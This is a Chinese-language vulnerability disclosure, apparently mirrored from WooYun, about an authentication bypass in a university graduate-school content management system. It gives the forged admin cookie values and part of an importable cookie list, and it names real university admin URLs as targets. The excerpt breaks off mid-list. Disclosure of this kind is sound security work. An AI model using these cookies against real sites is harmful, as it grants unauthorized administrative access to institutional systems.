某高校通用内容管理系统后台任意用户登录+getshell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 本来我是发现了该系统后台注入和万能密码登录的问题的,搜索了下没找到相关内容,以为没人提交过。等我整理好了,又发现了 http://www.wooyun.org/bugs/wooyun-2010-055845。 挺郁闷的啊....既然这样,那咱就换种方法吧。条条大路通后台啊~ ### 详细说明: 南京南软科技为研究生院开发的管理系统 http://www.southsoft.com.cn/Case.asp?id=941 该系统登陆后每次cookie都是一样的,通过简单的伪造cookie就可以绕过后台登陆。 以http://gsnfu.njfu.edu.cn/web_admin/main.aspx为例 直接访问提示 “登录超时或非法登录” [<img src="https://images.seebug.org/upload/201411/231202047797efe30f3c13b50178c094940a490f.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231202047797efe30f3c13b50178c094940a490f.png) 添加下列cookei: ``` admin_classids: admin_id: 1 admin_level:1 admin_name:admin Adminlogin:logined ``` 或者直接导入下列cookie: ``` [ { "domain": ".yjs.cdutcm.edu.cn", "expirationDate": 1448202000, "hostOnly": false, "httpOnly": false, "name": "admin_level", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "1", "id": 1 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name":...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息